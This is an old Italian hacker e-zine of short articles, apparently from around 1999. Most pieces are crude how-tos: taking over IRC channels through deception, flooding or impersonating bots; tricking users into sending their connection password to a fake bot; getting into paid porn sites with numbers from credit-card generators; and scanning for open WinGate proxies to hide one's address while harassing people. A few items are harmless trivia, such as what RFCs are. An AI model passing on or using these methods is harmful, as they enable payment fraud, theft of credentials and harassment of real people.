ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SEZIONE IRC ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹COME VELOCIZZARE IL TRASFERIMENTO DI FILE IN DCC SU mIRCÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Per rendere + veloce il trasferimento dei file su irc bisogna digitare in
qualunque canale, in query con qualcuno o nella finestra status il seguento
comando:
/pdcc 9999999999
{D4m4g3~M4N}

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹ COME FARE UN TAKE-OVER ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

METODO 1

Per prendere l'op in un canale dove ci sono SOLO 6 o meno op (xche se sono di
+ bisogna avere alleati o amici ndr; se gli op sono 6 oltre a voi potete cmq
deopparli se siete veloci deoppandone prima 3 e poi 2 e poi 1, se no gli anti
massdeop ti deoppano e ti kickano e vedrai che accoglienza al ritorno....hihihi)
basta lavorare un po' di social engeneering o come @zz si scrive. Prima di tutto
si entra in irc con nomi tipo sara, maria, manuela, claudia (anche se x noi maschi
e' un duro colpo alla ns dignita' \ø_ø/ ) e appena entrati si saluta e si parla
dicendo frasi tipo "
che bello che e' questo irc" stando attenti a non scrivere
troppo velocemente, a non dire cose tipo okki, 10x, byz cercando quindi di farci
passare per una new entry di irc o del computer.A questo punto, dopo che avrete
conquistato l'attenzione degli op colla terza gamba in mezzo (mi scusino le nobili
fanciulle...) andate all'assalto chiedendo info tipo

--> "
quanto dura irc?"
--> "
posso fare un mio canale"
a questo punto poi farete la...ehm...il finto tonto dicendo "
ma xche alcuni
hanno uno strano simbolo a fianco del nome?" a questo punto l'op maschio in
cerca di notorieta' dira' cose del tipo "
ce l'hanno i capi del canale, chi lo
comanda e decide tutto" e zac! con una frase del tipo "ma puo' averlo solo uno
alla volta?" o del tipo "come posso fare ad averlo devo pagare?" il nostro
bell'eroe dira' la magica frase che vi ricompensera' di 5 o 10 min buttati al
vento facendo finta di essere una ragazza..."
se vuoi lo do anche a te quel
simbolo". A questo punto non credo sia difficile capire che voi prima
ringrazierete amorevolmente, dopodiche' deopperete il , i 2 o i 3 op, gli altri
2 se ve ne fossero altri, sciagurati, chiamerete quelli della vostra crew o i
vostri bot e li opperete e vi farete una bella serata a vedere questi che
cercando di nukare il vostro win98 e con i vostri amici brinderete alla facciaccia
loro riportando una x sul vostro quaderno dei take, proprio alla 13a pagina,
ovviamente non saltando neanche un quadretto....ditemi quando arrivate alla 13a
pagina anche voi e' vi faccio membro onorario delle crew TaKKaTucheTaKKoAnChIO
......hihihi

METODO 2

Il secondo metodo consiste nel buttare giu' uno dei bot che sono oppati e che
vengono oppati automaticamente quando entrano nel canale, dopodiche' si prende
uno dei propri bot e usando un programmino che vi fa assumere qualunque nome
di server, porterete il bot nel canale col nome del bot caduto e cosi' vedrete
che il vs bot sara' oppato, e a sua volta oppera' voi e chi vorrete cosi' da
tentare un bel take...

METODO 3

Nukare, floodare, uccidere, drogare tutti i bot o le persone op dopodiche'
uscire e riprendersi il canale, prima che ritornino gli altri...

METODO 4

Consigliatomi da un IrcOp "
tu e i tuoi amici cambiate canale, ignorateli e vedrete
che si stuferanno (prima o poi- commento di {D4m4g3~M4N}) di occupare con i bot il vs canale".


ps: spero che nessuno abbia creduto alla faccenda del quaderno...e, per la cronaca non ho mai
fatto un take fin'ora e spero di continuare cosi'...senza problemi anche senza op...
pss: un consiglio molto valido e' di uscire da tutti i canali in cui siete xche sentirsi
dire "
Cara Beatrice ma come non sai cos'e' l'op???? ce l'hai su 4 canali...
adesso spiegami un po'...."...You are banned :(
psss: spero che non crediate di fare take su canali del tipo #hacker.it o #hacker
utilizzando il primo metodo....eheheh

{D4m4g3~M4N}

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹COME FARE AD AVERE LA PASSWORD DI QUALCUNO...CHIEDENDOGLIELA!ÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Anche se detto come e' detto nel titolo sembra una stronzata aspettate e
leggete e capirete che c'e' gente con le palle, allora c'e' n'e' anche
di......be lasciamo perdere! Allora la prima cosa da fare e' aprire due volte
mirc entrare con i 2 nick in un canale ed averli tutte e due oppati. A questo
punto date ad uno dei due nick il nome che potrebbe assomigliare a quello di
un BOt, come roBOT, 00bot00, bot^te. Con l'altro nick aprite una query con uno
dei deoppati del canale di cui siete sicuri al 100000000000% che sia uno che
nella vita i bot sa cosa siano ma che li vada a comprare in banca... Dopo i
soliti "
ciao" "come va" ditegli che dato che pensate che lui sia una persona
intelligente (fate finta come solo voi sapete fare!!!) volete mettergli a
disposizione la possibilita' di essere oppati dal vs bot (che sarebbe il nick
dell'altro client mIRC aperto) e ditegli di scrivere una cosa del tipo

"
/msg roBOTtino M0N4 alarcher80" dove:

roBOTtino ---> e' il nome del finto bot (siete voi nell'altra finestra irc)
M0N4 --------> e' il nome del vostro povero bersaglio (usato x sperimentare sto metodo)
alarcher80 --> e' la password di connessione dello sprovveduto :-)
Ricapitolando ditegli "
Per essere riconosciuto ora e sempre dal mio bot roBOTtino
mandagli un messaggio scrivendo /msg roBOTtino tuonome tuapassword" e se colui a
cui avete fatto il trucco e' mooooolto stupido mettera' la pass di connessione
(che potrebbe coincidere con quella della sua home page, della sua mail....chi
+ ne ha + ne provi :-) altrimenti se ne inventera' un'altra. A questo punto
mandategli un msg dall'altra finestra di irc del tipo"
indentificato" e dopo un
paio di secondi oppatelo (sempre col finto bot mi raccomando!). In questo modo
lui sara' oppato, voi avrete una password che se e' quella di connessione vi sara'
utile (chi sa a cosa serve mi mandi un msg e gli mando in mail qualche demo
microsoft di 30 MEGA....hihihi) altrimenti avete trovato uno che ne capisce
qualcosa e magari avete appena incontrato il vostro amico del cuore con cui
farete hacking x i prossimi 20 anni.......

ps:anche qui ho il mitico quadernone con LA connessione (fino ad adesso) che
tra le tante cose e' la mia :-) ma uno di questi giorni chissa' che abbia
tempo di fare il lamerone di turno....
pss: metodo mai sperimentato e non so nemmeno se lo ha partorito la mia mente
sovraffolata di doc in inglese indecifrabili o se e' "
opera di ingegno"
di qualcuno, se qualcuno sa qlcs basta che lo comunichi a me o a zero e
nel prox numero metteremo una sezione "
ERRATA CORRIGE" a mo' di Il Mio Computer.
ps: se l'utente a cui avete dato la finta "
dritta" non fa cio' che gli avete
ben bene spiegato xche' ha paura che sia un trucco (barlume di speranza
x l'umanita'...) voi dite qualcosa del tipo "
byez io devo andare che ho
da sbrigare una cosa, ci vediamo" e chiudete la finestra irc con il nick
vero e aspettate nela finestra del finto bot (il secondo nick) che il
temerario, incoraggiato dal fatto che voi siete usciti e quindi incoraggiato
dall'idea che non e' un metodo usato da voi x fottergli la password, incappi
nella vostra trappola...

{D4m4g3~M4N}
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
¬€€€€€€€€€€€€##########€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€##########€€€€€€€€€€€€¬
óÖÖÖÖÖÖÖÖÖÖÖÖ֎ŽŽŽŽŽŽŽŽŽŽ COME HACKKARE UN SITO PORNO ŽŽŽŽŽŽŽŽŽŽŽÖÖÖÖÖÖÖÖÖÖÖÖÖó

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME HACKKARE UN SITO PORNO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

iNDICE
01. iNDICE ;)
02. aVVISO
03. iNTRO
04. rEQUISITI
05. sETTARE IL BROWSER IN MANIERA OPPORTUNA
06. gENERATORE DI CARTE DI CREDITO
07. rESTARE ANONIMI
08. cOME OTTENERE UN PO' DI FAMA...SIAMO TUTTI DEI BASTARDI...
09. cONSIGLI PERSONALI
10. oUTRO

aVVISO
le informazioni che riporto qui sono da considerarsi esclusivamente a scopo
informativo...bla bla...non sono responsabile per nulla...bla bla...siete
totalmente risponsabili delle vostre azioni...bla bla...in qualsiasi caso...
io non ho mai scritto questo testo...chiaro? ;)

iNTRO
Allora, ansioso di hacckare un sito porno? BŠ, innanzitutto devo anticipare
che questo non Š uno dei miei sport preferiti, anzi, lo considero parecchio
da lamah, comunque sia pu• essere divertente provare ;) Cercher• di spiegarvi
come fare nel modo pi— veloce e semplice possibile.

rEQUISITI
Tutto quello che ci sar… necessario saranno un browser web (meglio se explorer
4x o netscape 4x) e un buon generatore di carte di credito. Ma di questo
parleremo pi— avanti. Iniziamo con il browser.

sETTARE IL BROWSER IN MANIERA OPPORTUNA
La prima cosa che devi fare quando hai il browser Š disabilitare l'utilizzo
dei cookies. Mi chiedi perchŠ? Eccotelo spiegato.

I cookies sono piccoli file contenenti informazioni che vengono inviati
automaticamente ad un server da un client. Se navigate spesso avrete
collezionato una grande serie di cookies! State attenti, questi piccoli
"
dolcetti" possono essere usati ad esempio per modificare le impostazioni
di una pagina web (ad esempio per inserire delle informazioni personali)
in modo tale da non doverle riscrivere tutte le volte che ci colleghiamo
ad un determinato sito web. Dall'altro lato possono contenere preziose
informazioni riguardante voi, la vostra adorata macchina, i vostri dati
di accesso...pensate un po'... Capirete quindi per quale motivo Š
conveniente e sicuro disabilitarne l'utilizzo.

Ok, dopo aver fatto questo, sar… necessario disabilitare anche l'uso
di Java e di Java Script. Non avete idea di quante informazioni possono
lasciare in giro di voi, siate diffidenti!

gENERATORE DI CARTE DI CREDITO
...o Credit Card Generator...sono dei programmini che creano un numero
di carta di credito assolutamente valida da usare per otterere la user
name e la password da questi siti a pagamento. Esatto...quello che
faremo sar… esclusivamente ottenere i dati d'accesso con una carta
di credito falsa ;) Loro accetteranno il numero di carta, attiveranno
il login, che per• durer… solo pochi giorni, fino a che si accorgeranno
dell'inganno..eheh...!! Se non ne avete questi programmi, vi consiglio
di scaricarvene uno, cercando su www.altavista.com "
carding" o "credit
card generator".

rESTARE ANONIMI
Eccoci, questa Š la parte un po' pi— impegnativa e pi— importante
dell'articolo. Ci sono vari metodi per rimanere anonimi (anonimi
in rete significa non lasciare a giro il vostro IP address, ndr):
uno di questi Š usare un account di anonymizer (www.anonymizer.com).
Questo servizio ti permette di navigare in completa anonimit…...
piccola clausula...costa 10mila lire al mese...porc'...ehmm..scusate.
Se avete intenzione di spendere questi soldi fate pure, ma penso
che sia necessario proseguire per chi non Š disposto a farlo.
Un buon metodo per restare anonimi Š quello di usare un server
proxy. Tralascio la spiegazione di "
proxy", anche perchŠ la
cosa andrebbe un po' per le lunghe, l'importante comunque Š
capire che:

- navigando normalmente
tuo account ---> provider ---> sito porno
tuo account <--- provider <--- sito porno

in questo modo il tuo IP pu• essere loggato da quelli del sito e
se fosse cos sarebbero cazzi amari...

- navigando usando un server proxy
tuo account ---> provider ---> server proxy ---> sito porno
tuo account <--- provider <--- server proxy <--- sito porno

come potete vedere tutti i dati che invio e che mi giungono passano
per il server proxy...immaginatevi se questo non registra il vostro IP... ;)

p.s.: dimenticavo, se non siete sicuri che il vostro server proxy
anonimo sia effettivamente anonimo, baster… che andiate su
www.anonymizer.com...hanno una pagina dedicata solamente a
comunicare vostre informazioni..ad esempio:

- andando su anonymizer senza proxy vedrete:
Your connection provider is located in Italy
Your IP address is (il vostro vero IP)
Your Internet browser is Netscape/4.04[en]
(Win95; I; 32bit; Nav)
You are coming from Anonymizers homepage.

- se invece userete un proxy anonimo vedrete:
Your connection provider is located in Japan
Your IP address is (l'IP del server proxy)
Your Internet browser is Mozilla/4.04[en]
(Win3x; I; 16bit; Nav)
You are coming from Anonymizers homepage.

capito il concetto?

cOME OTTENERE UN PO' DI FAMA...SIAMO TUTTI DEI BASTARDI...
Ok..una volta che avete ottenuto username e password? Bene - mi direte voi -
ce ne andiamo a giro per il sito... ok ma se oltre ad avere qualche foto
xxx e qualche video volete un po' di "
fama", non dovrete far altro che
mandare username e password al sito www.xxxpassword.org... l'account
che avete attivato verr… messo a disposizione di migliaia di utenti
che, se volete, vedranno il vostro nome accanto a "
hacked by.."
...eheh...eh gi…...siamo proprio dei bastardi!!!...

cONSIGLI PERSONALI
Cercate di approfondire, se non li avete chiari, i concetti di proxy,
IP, log...ecc...in questo caso vi saranno utili, ma vi saranno molto
pi— utili in situazioni diverse (alcune info le potete trovare leggendo
l'articolo "
RFC" su questo numero, ndr).

oUTRO
Bene, tutto quello che vi rimarr… da fare sar… quindi trovare un
buon server proxy !anonimo!, andare sul sito porno, comunicare i
vostri !falsi! dati, il vostro numero !falso! di carta di credito
ed il gioco Š fatto...
Mi raccomando, state attenti a quello che fate, se per caso verrete
loggati saranno problemi vostri, in qualsiasi caso...
Buon Divertimento!!!!!

_p0nic0_ (_p0nic0_@SoftHome.net)
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ RFC ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

iNDICE
01. iNDICE ;)
02. aVVISO
03. cOSA SONO GLI RFC?
04. oUTRO

aVVISO
le informazioni che riporto qui sono da considerarsi esclusivamente a scopo
informativo...bla bla...non sono responsabile per nulla...bla bla...siete
totalmente risponsabili delle vostre azioni...bla bla...in qualsiasi caso...
io non ho mai scritto questo testo...chiaro? ;)

cOSA SONO GLI RFC??
RFC, acronimo di Request for comments, sono una serie di documenti che
descrivono il funzionamento dell'intera rete disponibili online. Aggiornati
frequentemente, gli Rfc contengono spiegazioni di carattere tecnico sui protocolli,
sull'evouluzione della Rete, verbali di conferenze sull'argomento, ecc...
Immaginetevi a cosa possono essere utili! Per tovarli baster… che usiate un
qualsiasi motore di ricerca con parola chiave, appunto, RFC.

oUTRO
a presto...

_p0nic0_ (_p0nic0_@SoftHome.net)

NOTA DI N0bodY88: siccome gli RFC sono tutti in inglese e nessuno ha mai pensato
di tradurli (anche se ADaM degli Spp mi sembrava avesse proposto
e forse [non so xche' non gliel'ho ancora chiesto] in parte
realizzato la cosa) chiunque abbia una buona conoscenza del
l'inglese mi scriva che se siamo in tanti con poco sforzo ciascuno
potremmo riuscire a tradurli.PS: io avevo pensato a tradurli
ma siccome sono un newbies (1) e alcuni termini non li conosco (2)
se c'e' qualcuno pronto a dare una mano ad ADaM (se e' ancora
interessato) e a me per tradurli si faccia avnti...alla mia email.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IP SPOFFING ATTRAVERSO I WINGATE By Zinco ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Sogno di ogni client di IRC Š quello di nascondere ad un occhio vigile il suo Host di
provenienza, tutto questo Š molto semplice, basta avere degli ip di server che possiedono
il programma WINGATE in esescuzione. (non Š altro che un programma che permette
a + computer di collegarsi ad internet con pi— PC ad un solo modem)
Una peculiarit… di questo programma Š quella di non richiedere il settaggio di
password e per questa ragion possono essere utilizzati per varie operazioni
a noi utili ;)

Come trovare i PC con wingate installati?

Le operzioni da svolgere sono semplici, basta utilizzare uno scanner di wingate come
"
Wingate scan 2.2", infatti questo programma apre una sessione TELNET sulla porta 23, quella
appunto del wingate, avvertendoci quando uno dei PC remoti in cui si Š tentato il
collegamento ha risposto con la stringa: "
WinGate>".
Per effettuare la scansione occorre inserire un intervallo di IP ed il programma verifica se
in questo intervallo sono presenti server con wingate installato.
Il problema Š inserire un intervallo di IP valido.. Inserendo degli IP Š un opzione che io
sinceramente non vi consiglio, sarebbe troppo lungo ed avreste bisogno di una notevole dose
di fortuna. Quello che consiglio e magari prendere l'ip di qualcuno che pensiate o sapete
che stia spoffando e lo inserite come base di partenza per la scansione.
Detto cos pu• sembrare molto difficile trovare wingate, ma non lo Š, una volta che avete
beccato una "
zona" di IP , ricca di WINGATE , in genere Š sempre li che riandrete a cercare.

Ottenuto l'ip del Wingate, ci sono vari metodi per utilizzarlo per spoffare, io vi
descriver• il pi— semplice e veloce.

CLIENT MIRC

Dovete andare nel men— "
mIRC Setup" e da li a "Firewall"
Inserite l'ip del wingate nella casella "
Hostname", abilitatelo con "Use SOCKS firewall" e
non inserite ne User ID e ne Password. Fatto.
Ora cercate di collegarvi al server IRC, non farete altro che collegarvi prima al wingate,
acquisendo il suo ip e da qui vi collegherete al server irc (es. irc.tin.it, ecc.).

CLIENT VIRC

Dal men— "
Client Setup" andate nella voce "VIRC Option", poi "Winsock" ed infine "SOCKS".
In quest'ultima inserite l'IP del wingate nella casella "
Server" e abilitatelo con "SOCKS
support enabled".

In entrambi i CLIENT le porte devono essere le 1080
By Zinco

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹CURIOSITA' SU... JOE ACCOUNTÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Quanti di voi sanno cosa e' un Joe account? Per quelli che non lo sanno e' un
modo di dire utilizzato nei sistemi unix per indicare le situazioni in cui un
utente utilizza il proprio nome come password (molto pericoloso ma molto comodo
x chi si deve decriptare il passwd infatti alcuni se non tutti i programmi x
crackare le pass contenute nel passwd provano il nome, il cognome e poi cominciano....).
Per quelli che invece lo sapevano gia', be.......buon x loro :-)

N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ»
ÌÍÍ͹CUIOSITA' SU... LA PRIVACY SU NETSCAPEÌÍÍ͹
ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ

Il browser + usato per la navigazione in rete permette a chiunque abbia accesso
al nostro amato picci, di vedere la lista dei siti che abbiamo visitato. Questo
puo' sembrare difficile a sentirlo ma farlo e' una cacchiata, infatti basta
semplicemente scivere in Netscape al posto del solito www.yahoo.com questo:
"
about:globalhistory"
Riporto qua sotto un esempio del risultato che si puo' avere coll'immissione
della stringa sopra citata:

Voci elenco cronologico globale

URL: http://www.cumpra.it/imaggini/fisse_prima/barra.gif
Data: Sun Dec 20 15:51:47 1998

URL: http://www.internet2.it/misc/hackeraggio/crediastolinkl.gif
Data: Sun Dec 20 15:51:54 1998

URL: http://144.144.144.69/articoli/sitoporno/oro_scopo.gif
Data: Sun Dec 20 15:52:11 1998

URL: http://243.32.120.21/articoli/fisse_prima/nonpiufisse_dopo.gif
Data: Sun Dec 20 15:52:18 1998
Se volete potete provare a mettere altri "
about:" seguiti da nomi come mozzilla,
communicator, oppure provate con i nomi dei programmatori di netscape e avrete
una bella sorpresa.......

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍ»
ÌÍÎ͹CURIOSITA' SU... QUANDO HACKERAREÌÍÎ͹
ÌÍÎ͹ (O ALMENO TENTARE) ? ÌÍÎ͹
ÈÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊͼ

Partendo dal fatto che sono solo un newbie volevo introdure una questione di
cui discutevo con un amico inglese (du iu spic ingliss? hi hi hi [citazione
masteriana]). Se 10 anni fa (bello avere 8 anni.....) il momento migliore x
"
tentare di hackerare" (e' diverso da "hackerare") qualcosa era di notte fonda
o la mattina mooolto presto, al giorno d'oggi e' QUASI meglio cercare di
entrare in un server quando c'e' l'amministartorone che vigila (cioe' di
giorno) che tentare di entararci di notte con 200 log pronti a loggarti ogni
minimo starnuto...
Se avete commenti, opinioni o volete soltanto dire quando preferite hackerare
basta che scriviate a me o a Zerocool e (se non vi sono affermazioni contrarie
nella mail) che la pubblicheremo sul prossimo numero di Newbies, sempre che il
progetto continui e che la crew non finisca per disfarsi....

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍ»
ÌÍÎ͹CURIOSITA' SU... COME CREARE UN COLLEGAMENTO A INTERNET CON NOTEPADÌÍÎ͹
ÌÍÎ͹ (X FAR VEDERE CHE SIETE VERI HACKERS....HI HI HI) ÌÍÎ͹
ÈÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊͼ

Dato che la e-zine non deve seguire schemi precisi e che ci stiamo sbattendo
per voi (...) ho pensato di mettere questa curiosita' che se non centra niente
coll'hacking almeno centra con internet. Sia che ci crediate o no si possa
fare aprite Notepad e inserite in un doc non formattato le seguenti righe:

[internetShortcut]
url=http://www.lohackers.chebonta

Dopodiche' salvate il file con estensione .URL e il gioco e' fatto!
(info prese da Inter.net n.42 gennaio 1999)

N0bodY88 (n0body88@freemail.it)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SPOOF ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

STRUMENTO UTILIZZATO = PORTSCAN (new-collegamento Attivo 154kb) + GuidaSpoof by RacerX
ABILITA' = MEDIA

Ehheh-, ultimamente va di moda usare gli ip spoffati.... mi accinger• quindi
a spiegarvi + o - come spoffare il vostro ip.... Allora, innanzi tutto,
perchŠ spoffarsi? c'Š pi— di un motivo,per iniziare

  
quando andate irc nessuno
vede il vostro vero ip facendo un dns o un whois,perci• anke volendo non pu•
nukkarvi o floddarvi, poi, quando andate su qualche canale a fare casino
potete star tranquilli che anche se siete tracciati dalle vittime non possono
risalire al vostro nick, va detto che se voi siete fakkati, bombate uno, lui
non pu• scoprire il vostro nick per• puo sempre nukkare l'ip che gli Š
arrivato heheheh, un ultimo motivo per fakkarsi Š il fare scherzi alla gente...
...vi rimando perci• all'apposita sezione:o)) Avviate Portscan.Ora va configurato,
andate al menu file-->edit ports.Aperta la finestra dei settaggi, sulla destra
avrete un menu scorrevole dele porte che volete scansionare.. selezionate
Firewall (1080) poi sulla sinista dove sta scritto "port set" , c'Š uno
spazio dove dovrebbe essere scrito firewall, se non c'Š scritto scrivetecelo,
cliccate sul tasto save set e poi sul tasto ok,....bene, per adesso i settaggi
sono apposto adesso passiamo all'azione: innanzi tutto andate su un canale
irc.. vedete un po' voi poi dovete fare un dns a qualkuno a caso.... l'importante
Š che dal dns che avete fatto risulti sia l'ip che l'address, fatto ci• avrete
un ip del tipo 194.634.25.76 (l'ho scazzato) adesso fate un copia incolla
dell'ip nei 2 campi nel portscanner cio nelle caselle, poi cambiate l'ip
sostituendo l'ultimo numero,nella prima casella mettete 1 e nella seconda
mettete 100 o 200 194.634.25.1 / 194.634.25.100 cliccate sul tasto start scan
e apparir… la finestra della scansione... nella parte in basso avrete le porte
che state scansionando..... quando ne troverete una buona apparir… sotto l'ip
la scritta firewall on port 1080 ehheheh ok adesso vediamo come usare l'ip spoffato...
